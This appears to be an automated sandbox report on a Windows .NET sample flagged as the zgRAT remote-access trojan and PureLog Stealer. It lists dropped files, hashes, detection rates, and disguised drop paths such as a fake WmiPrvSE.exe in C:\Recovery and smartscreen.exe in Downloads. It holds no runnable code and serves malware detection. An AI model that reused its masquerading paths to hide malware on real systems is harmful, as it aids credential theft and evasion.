                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x74ad5aab, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.6585684544353494
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:xz/SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/T:xz/aza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                MD5:84FD141814258B7EF8CFCA3B8653A72B
                                                                                                SHA1:09D196D30BF72380FBE0C1951A64C0C24D558646
                                                                                                SHA-256:E72C611F5E4F02987DCBE5D5FF98484CB7245FE60858026795AD2BD97171FC18
                                                                                                SHA-512:706C5A31D3CB5363DDC7DB8E97725D869FC330B4FF7FAC157A53FCFAEA44E7EB2BF969C46956DF519AE6EE99AA46F891259B03BDC8DACD0B11C6C4528524E150
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with very long lines (680), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):680
                                                                                                Entropy (8bit):5.89693201530972
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:zDs7LgH4a8AOjYIMgZF6VWSVcADAsn8m+RgLNPgruzO0CJ5vqVFPn:cn7hj5F6sXgL9grmqqVRn
                                                                                                MD5:7024CB3FE729C4DCB0124D961CC7C19F
                                                                                                SHA1:5490E135CD96BF89A31BAD79D4B18DEE69D8907D
                                                                                                SHA-256:4A35E7C88264E6882083A2546FD4E98B496571851A60F8F4CD2946A70786AE2D
                                                                                                SHA-512:72757D7508CB950DF4FF6175758F655A6D89A287EDB436035A4B4398C0E094F0FDA479018E81DA69697DE0AF33A15D5DC61BC4D907DA292F559073CD8B4D813A
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with very long lines (630), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):630
                                                                                                Entropy (8bit):5.87542376712451
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:VeKWrFW4gsFWbpy8ZxNkWrOB1NmPsK15+T3g1O/ezt7yXH9L:U3rw4gs58ZHhaDQPj15+T34Weo
                                                                                                MD5:B85462C0FCA1337755B7424ED26863CD
                                                                                                SHA1:C5ADDA726EE7AF2EC97E445FBEE24F8AE02370AA
                                                                                                SHA-256:5460E5B4531BC7BB82B5A553CEB4CB3E37F4BEF5CE0BEED28804FE75A8AF9832
                                                                                                SHA-512:FAAF79DE154CBE2DD8E10B8A4E9F7BF182EA59DD636B8BB027C123EF63C8A19A27EBD02E51EAB241106F979704CEB308E4643D65A9240FDE5C210166C883B775
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):181
                                                                                                Entropy (8bit):5.711623775076942
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Gj8h3WqDSw95Qsk1V7svonmSKxUWtH1G58o3U/R3jmMetIeO8g+AO5KrXTahV:JlWmO5FFfWzGGoktm9t+YsahV
                                                                                                MD5:E644D4200BA085D49A1BBBC391555A27
                                                                                                SHA1:9A4C09DCBE6339C1586CAD600F1981F1BF66BC1F
                                                                                                SHA-256:E862343DED7D246BF3CB37DF99A94DA41D012B1AF1A6F5023767D6CBC703B758
                                                                                                SHA-512:218C1DB17964026C58E0DFEA59405646038FF2237498A794F8558DF02BDFD11EDA012DAD08FE747C2E5C4C3D98C55FBE2D73C909420848EC79AD8F2EB3511C7F
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.354334472896228
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                Process:C:\Recovery\WmiPrvSE.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.354334472896228
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):2126
                                                                                                Entropy (8bit):5.371983462188659
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs1HUHKVHzHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj10qVTqZ4T
                                                                                                MD5:135C39705E03FF05FF25EA2635542779
                                                                                                SHA1:C83DF8AC9DD1D98339BBAB63FB62816CBDB22B98
                                                                                                SHA-256:3F577910F11F685B33195C01A9A4138D00AB145B2BF3E8180B6C5363E92E2860
                                                                                                SHA-512:7ABAD821F047639F306A7C89127C00D00783E899A80F572EAEC3D87B2946177C3FA3BDFB17AE474DE330D8FAAAB7ED0A585683487AC7728F30AABFBDE655FB53
                                                                                                Malicious:true
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                                Process:C:\Users\user\Downloads\smartscreen.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.354334472896228
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):19253
                                                                                                Entropy (8bit):5.005753878328145
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                                MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                                SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                                SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                                SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                                Malicious:false
                                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):98304
                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.136413900497188
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                Malicious:false
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                Category:dropped
                                                                                                Size (bytes):196608
                                                                                                Entropy (8bit):1.121297215059106
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                Malicious:false
